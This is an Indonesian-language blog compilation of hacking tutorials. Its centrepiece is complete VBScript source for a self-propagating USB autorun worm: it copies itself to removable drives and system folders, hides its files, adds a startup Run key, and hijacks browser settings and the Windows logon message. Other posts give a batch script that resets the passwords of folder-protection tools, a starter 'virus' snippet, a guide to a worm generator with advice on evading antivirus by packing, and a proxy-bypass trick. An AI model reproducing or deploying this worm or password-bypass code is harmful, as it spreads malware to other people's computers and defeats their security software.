Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Cara Menembus Proxy

2009-11-10T01:49:00.000-08:00

Nah kali ini saya akan membahas bagaimana caranya menembus proxy....wakakakakakak....nah biasanya kan ada proxy kita yang diblokir ama suatu situs web...nah disini kita kana membahas bagaimana cara menembus nya...neh tutorialnya....

1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt

2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...

Code: Select all
ping www.youtube.com

maka kita dapat melihat ip addressnya yaitu :
kita mendapatkan ip addressnya yaitu :

Code: Select all
208.177.236.70
3. masukkan alamat ini ke

Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :

dan mari kita tunggu hasilnya ( sambil minum kopi )

Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126

4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya :

bang...gagal dech....wkwkwkwk....becanda....

Membuat Script Indonesia Jaya Tembus Password

2009-11-10T01:47:00.001-08:00

Wakakakakakak...Ini hasil COPAS ( Copy Paste )....ya sekedar wat tambahan...yar semua ngerti cara nembus berbagai script....Met Mencoba

Pada kesempatan kali ini, saya mencoba berbagi script ( kayaknya mendingan berbagi angpau lebih enak deh. Hi Hi Hi)

Tujuan Script ini adalah untuk mereset password berbagai program security populer. Script ini tentu saja bisa dikembangkan lebih lanjut menjadi script yang lebih banyak - atau menjadi program beneran. Tapi kali ini cukup yang bohong2 an saja ya

================================

Script atau program mini imut2 ini saya namakan INATAPA, singkatan dari Indonesia Jaya Tembus Password. Mengapa namanya begicu ?

Karena script ini akan mengubah password dari program-program yang anda lupa/tidak tahu passwordnya - akan diubah menjadi password resetnya yaitu Indonesia Jaya.

Mengapa passwordnya harus "Indonesia Jaya"?
Nggak ada alasan khusus sih. Kadang tidak semua program mau menerima password kosong, sehingga mendingan dibuat ada saja.

Scriptnya bisa dibuat dengan Notepad,

Cuplikan scriptnya seperti di bawah ini :

@echo off

Title INATAPA v01 - 2008
echo.
echo INATAPA v01 : Indonesia Jaya Tembus Password versi 01
echo ---------------------------------------------------------------------------
echo Script Kecil untuk membuka file konfigurasi berbagai Program Security
echo.
echo Oleh : Lovepassword - www.lovepassword.blogspot.com
echo Kredit : TopengDigital - www.topengdigital.com
echo.
echo Program ini bebas dicopy serta dimodifikasi oleh siapapun
echo.

:PILIHAN
echo.
echo Silakan pilih Program yang ingin anda buka file konfigurasinya
echo ---------------------------------------------------------------------------
echo.
echo 0. Regedit Standard
echo 1. PC Security (dicoba dengan versi 6.4 ) - www.tropsoft.com
echo 2. FolderGuard (dicoba dengan versi 7.91) - www.winability.com
echo 3. MySecretFolderXP (dicoba dengan versi 4.31) - www.winability.com
echo 4. Hide File and Folder (dicoba dengan versi 3.1 ) - www.softstack.com
echo 5. Folder Lock (dicoba dengan versi 5.90) - www.newsoftwares.net
echo 6. Hide Folder (dicoba dengan versi 3.1 ) - www.hide-folder.com
echo 7. EasyFile nF Protector(dicoba dengan versi 3.9 ) - www.softstack.com
echo 8. Winboost (dicoba dengan versi 4.9 ) - www.winboost.com
echo 9. USB Lock (dicoba dengan versi 2.5 ) - www.advansysperu.com
echo 10. - Keluar dari Program ini
echo 91. - Sikat Semua Program yang terdaftar
echo.
echo Dalam banyak kasus - versi program biasanya tidak ada pengaruhnya.
echo ----------------------------------------------------------------------------
Set /P pilih= Pilih Nomor program :
cls
For %%a In (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 91) Do if "%pilih%"=="%%a" Goto Pilihan_%%a
echo.
echo Salah Input ! Pilihan 0 sd 9 untuk memilih program
echo.
echo Atau pilih 10 untuk keluar atau 91 untuk memilih semua program
echo.
echo Tekan Sembarang Tombol untuk kembali
pause>NUL
cls
Goto PILIHAN

:Pilihan_0
echo 0. Anda memilih membuka proteksi Regedit
echo -----------------------------------------------------------------
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

echo.
if Not "%Pilih%" == "91" (
echo.
pause
cls
Goto PILIHAN )

:Pilihan_1
echo 1. Anda memilih masuk file konfigurasi PC Security
echo -----------------------------------------------------------------
echo.
if exist %temp% _PCSecurity.reg del %temp% _PCSecurity.reg
Start /wait REGEDIT /E %temp% _PCSecurity.reg "HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsys"
if not exist %temp% _PCSecurity.reg echo Registry PC Security tidak ditemukan
echo.
if not exist %windir%dwpces23.dru echo File Password PC Security tidak ditemukan
echo.

if exist %windir%dwpces23.dru (
echo File Password PC Security ditemukan, Password akan dibackup dan direset
copy %windir%dwpces23.dru %temp%dwpces23.dru
del %windir%dwpces23.dru
echo.)

if exist %temp% _PCSecurity.reg (
echo Registry PC Security ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp% obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsyscopp] >> %Temp% obol.reg
Echo "s"=hex:56,11,ad,21,7b,08,bc,1b,6e,c3,93,13,86,04,49,b2,0d,a3,49,b2,60,e8,8c, >>%Temp% obol.reg
Echo 07,5f,ec,9d,0b,0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2,60,e8,8c,07,5f,ec,9d,0b, >>%Temp% obol.reg
echo 0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2 >>%Temp% obol.reg
Start /w REGEDIT /S "%temp% obol.reg"
del %Temp% obol.reg
echo.
echo * Untuk masuk PC Security, Masukkan Password : Indonesia Jaya)

echo.
if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

:Pilihan_2
echo 2. Anda memilih masuk file konfigurasi FolderGuard
echo -----------------------------------------------------------------
echo.
if exist %temp% _FolderGuard.reg del %temp% _Folderguard.reg
Start /wait REGEDIT /E %temp% _FolderGuard.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityFGD"

if exist %temp% _FolderGuard.reg (
echo Registry Folderguard ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp% obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityFGD] >> %Temp% obol.reg
Echo "FGP"=hex:46,47,50,00,09,04,00,00,73,bc,00,00,00,00,00,00,00,00,00,00 >> %Temp% obol.reg
Start /w REGEDIT /S "%temp% obol.reg"
del %Temp% obol.reg
echo.
echo * Untuk masuk Folderguard, Masukkan Password : Indonesia Jaya)

if not exist %temp% _Folderguard.reg echo Registry FolderGuard tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

:Pilihan_3
echo 3. Anda memilih masuk file konfigurasi My Secret Folder XP
echo -----------------------------------------------------------------
echo.
if exist %temp% _MySecretFolder.reg del %temp% _MySecretFolder.reg
Start /wait REGEDIT /E %temp% _MySecretFolder.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityMySecretFolder"

if exist %temp% _MySecretFolder.reg (
echo Registry My Secret Folder XP ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp% obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityMySecretFolder] >> %Temp% obol.reg
Echo "AdminData"=hex:a9,47,dd,be,cf,04,ef,2e,f4,43,d8,0f,bd,ad,92,bb,18,5a,2e,5e >> %Temp% obol.reg
Start /w REGEDIT /S "%temp% obol.reg"
del %Temp% obol.reg
echo.
echo * Untuk masuk My Secret Folder XP, Masukkan Password : Indonesia Jaya)

if not exist %temp% _MySecretFolder.reg echo Registry My Secret Folder XP tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

DAN SETERUSNYA >>>

Daripada para teman pusing mengetik, silakan anda download saja scriptnya di sini.

http://www.ziddu.com/download/3624397/INATAPA.zip.html

Script tersebut sudah dilengkapi kemampuan membackup password aslinya. Hanya saja tidak ada fitur untuk mengembalikan password lama yang direset tadi

Membuat Antivirus Autorun di Flashdisk

2009-11-10T01:43:00.000-08:00

Judul nya terdengar seperti orang pinter saja yang nulis hehehe padahal lahh nda ada apa-apanya.. Begini nih lengkapnya karena sudah dikasih judul seperti itu maka akan saya jelaskan walaupun mungkin tutorial ini sudah banyak beredar di internet namun, kenapa nda kita mempercepat pencarian orang dalam mencari solusinya .. bener kan?
Virus menjengkelkan sering masuk ke Flash disk kala kita masukan Flash disk kita ke USB Port. Ada memang flash disk produksi dari Kingston yang telah dapat di Install anti virus dengan type U3. Namun untuk flash disk kita yang cuman harga 100 rbuan kenapa nda kita buat juga biar ada anti virus dalam Flash disk kita. Begini caranya:
Download Anti Virus yang sifatnya portable. Sarankan makai PCMAV deh biar ga beribet. Anda bisa menggunakan ANSAV (Ansav.exe – jangan ANSAV Security Guard) atau PCMAV (PCMAV-CLN.EXE – Jangan PCMAV-RTP.EXE) Masukkan file Anti Virus Portable (plus file library pendukungnya – bila ada) tersebut ke dalam Flash Disk Anda.
Bila sebelumnya atau secara default Windows tidak mengijinkan proses “AutoRun” dari USB Flash Disk, maka Registry-nya seperti ini:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000095
Agar Windows bisa mengijinkan proses “AutoRun” dari USB Flash Disk, maka ubah Registrynya menjadi:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000091
Anda bisa mengCopy Registry Lines tersebut, lalu Anda simpan sebagai (misal): “AutoRun_Removable_Media_Enable.reg” untuk Anda Klik kanan dan Merge (gabungkan) dengan Windows Registry Database.
Setelah Anda berhasil memasukkan Registry Entry Files ke dalam Windows Registry Database, maka pekerjaan Anda yang terakhir adalah membuat file “autorun.inf” yang berfungsi sebagai Command dengan rujukan ke File Anti Virus yang telah Anda download dan masukkan ke dalam Flash Disk Anda (pada Langkah I)
Dalam contoh ini, Penulis menggunakan PC Media Anti Virus PCMAV-CLN.EXE yang filenamenya telah Penulis ubah menjadi PCM4V-CL34N32.EXE guna menghindari pendeteksian Virus yang dimungkinkan akan memblokir PCMAV-CLN.EXE.
Maka file “autorun.inf” PCMAV menjadi seperti ini:
PC Media Anti Virus
[AutoRun]
open=PCM4V-CL34N32.EXE
icon=PCMAV.ICO
shellexecute=PCM4V-CL34N32.EXE
shell\Scan Virus\command=PCM4V-CL34N32.EXE
shell=Scan Virus
Salin baris-baris INF tersebut, dan simpan sebagai .INF file dengan nama “autorun.inf” (tanpa tanda kutip), kemudian letakkan file “autorun.inf” tersebut pada Root Flash Disk Anda.
Sumber: Berbagai sumber dan henryussa.wordpress.com/2008/03/12/membuat-anti-virus-autorun-dari-flash-disk/

Cara Membuat Virus Autorun

2009-11-10T01:40:00.000-08:00

Adapun cara membuat virus autorun sebagai berikut
1. script coding pertama
[autorun]
shellexecute=wscript.exe apiph.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua
'apiph-X2
'Varian dari apiph.VBS
on error resume next 'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,apiph,nt,check,sd
'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe apiph.sys.vbs"
set apieph = createobject("Scripting.FileSystemObject")
set mf = apieph.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = apieph.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = apieph.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = apieph.getfile(syspath & "\recycle.vbs")
tf.attributes = 39
'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in apieph.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=apieph.getfile(desades.path &"\apiph.sys.vbs")
tf.attributes =32
set tf=apieph.createtextfile(desades.path &"\apiph.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=apieph.getfile(desades.path &"\apiph.sys.vbs")
tf.attributes = 39
set tf =apieph.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=apieph.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
'Manipulasi Registry
set afif = createobject("WScript.Shell")
'Ubah IE Title
afif.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"
'Ubah tulisan pertama pada text box menu RUN
afif.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "AFIF-X2/1"
afif.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"
'Buat pesan saat Windows Startup
afif.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "AFIF-X2"
afif.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Saya Diambil Alih"
'Aktifkan saat Windows Startup
afif.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"
'Ubah Default Start Page Internet Explorer
afif.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://anandayunade.blogspot.com"
'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “apiph.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut

- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.
Met mencoba….ha ha ha

Mari Berkenalan Dengan Macam-Macam Virus

2009-11-09T00:42:00.001-08:00

Worm atau biasa kita menyebutnya cacing komputer adalah program komputer yang bisa menduplikasikan diri dari satu komputer/terminal ke komputer lain dalam suatu jaringan. Ini beda dengan virus yang sifatnya merusak file, worm tidak merusak atau menempel pada suatu program. Worm hanya mengacaukan jaringan dengan mengkonsumsi bandwidth.
Trojan Horse, dari namanya yaitu kuda trojan atau biasa disebut ‘trojan‘ saja bisa diperkirakan seperti apa makhluk ini sebenarnya. Trojan adalah software yang diprogram untuk melakukan perintah-perintah tertentu sesuai yang diinginkan sang pembuat, dan biasanya merupakan perintah-perintah yang bersifat jahat.
Bisa saja trojan berbentuk virus atau worm.
Trojan bisa lebih berbahaya daripada sekedar virus. Apa sih yang bisa dilakukan trojan?
• Remote Access: Bila komputer Anda kena trojan jenis ini, komputer bisa dikendalikan dari jarak jauh via internet/jaringan dengan mudah oleh sang pembuat trojan.
• Data Destruction: Trojan bisa menghapus atau menimpa file-file tertentu.
• Down loader: Secara diam-diam komputer target mendownload file-file tertentu bisa berupa virus, worm, atau program-program lain yang lebih jahat.
• Mengenkripsi file.
• Upload file secara tersembunyi.
• Membuat screenshot.
• Mencuri password dan nomor kartu kredit dengan logging keystroke.
• Install backdoor.
• membuka dan menutup CD Drive.
• Mematikan antivirus dan firewall.
• phissing.
• Membuat komputer zombie untuk serangan DDoS atau mengirim spam.
• dll
Rootkit, adalah program yang didesign untuk mengambilalih akses root (Unix) atau administrator (Windows) pada sistem komputer secara tidak syah. Tidak syah maksudnya ya secara diam-diam tanpa sepengetahuan pemilik atau admin komputer. Tentu saja dengan punya hak akses penuh terhadap system, program rootkit bisa melakukan apa saja. Sehingga pengguna awam tidak akan sadar bahwa sesungguhnya system telah tercemar.

Cara Membuat Worm Dengan VB

2009-11-09T00:02:00.000-08:00

Tulisan ini dibuat untuk para newbie yang ingin tahu, dan mencoba sesuatu hal yang baru dan cukup menyenangkan dan mengasikan…he..he…
Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..

—- more —-
Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw)

Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal. Atau e-mail aj ke sang empunya di: rzwan182@gmail.com.
Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:

1. Sebuah gelas yang berisi soda gembira.
2. Sebuah lagu dari mxpx,RHCP,Blink 182,dan Green Day
3. Makanan ringan ( yang ada isi nya,jangan cuma bungkusnya )
4. Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…)
Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.

Tampilan VB+Vimaker32 RC 03 :

Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gt.

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he…

Berikut tampilan Registry Action Selector :

Window Caption Selector

Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)

File virus hasil compile :

File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker xxx Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini. Dan penulis ucapkan terima kasih kepada jasakom yang telah bersedia mempublish artikel ini.

Cara Membuat Worm Untuk Pemula

2009-11-06T16:28:00.001-08:00

Untuk saat ini saya akan membagi Ilmu saya untuk anda,he he he,dah kayak profesor aja main bagi ilmu,he he he.Ya mungkin istilah worm sudah tidak asing bagi anda,apa itu worm yang ada di komputer dan apa effect samping yang di berikan worm kepada komputer anda,pasti anda semua sudah tahu tentunya.Mungkin anda mengira membuat worm di butuhkan otak seperti habibi (emang mau bikin pesawat) he he he,tapi yang akan saya tulis ini adalah untuk para pemula,anda tidak usah menyediakan obat sakit kepala,karena membuat worm itu mudah.Oke lah gak usah banyak omong lagi,mari kita praktekkan saja

Saya akan membahas bagaimana caranya membuat agar virus kita itu dapat menginfeksi special folder ( kayak WINDOWS,TEMP,SYSTEM32 )

Tanpa banyak bacot lagi,ini dia code nya

Pertama anda harus membuka notepad (tahu notepad kan ? ) klo anda bingung,caranya klik start lalu klik run trus ketik notepad di kolom run trus tekan enter dech

Kedua kamu harus ketik

on error resume next
set xgudril=createobject("scripting.filesystemobject")
xwind=xgudril.getspecialfolder(0)
set salin=xgudril.createtextfile(xwind & "coba.vbs")
salin.writeline "infeksinya berhasil boss"
msgbox ("sukses bos")

Oh iya nomer-nomer untuk special folder adalah
WINDOWS = 0
TEMP = 2
SYSTEM32 = 1
( kode di atas khusus pengguna Windows XP )

Nah selesai dech viruz nya,bagaimana jika viruz kita itu kita isi perintah yang bersifat merusak,wah-wah jangan sampai dech,jangan sampai disalahgunakan ya,he he he

Saya kira cukup sekian,mungkin untuk pengembangan virus ini akan saya bahas di lain waktu,jika blog saya udah terkenal,he he he,klo ada yang punya ilmu jangan di simpan sendiri,share aja disini,he he he

Sebagai Bonus saya kasih link program jahil

Mousemove

Hide Start

Peace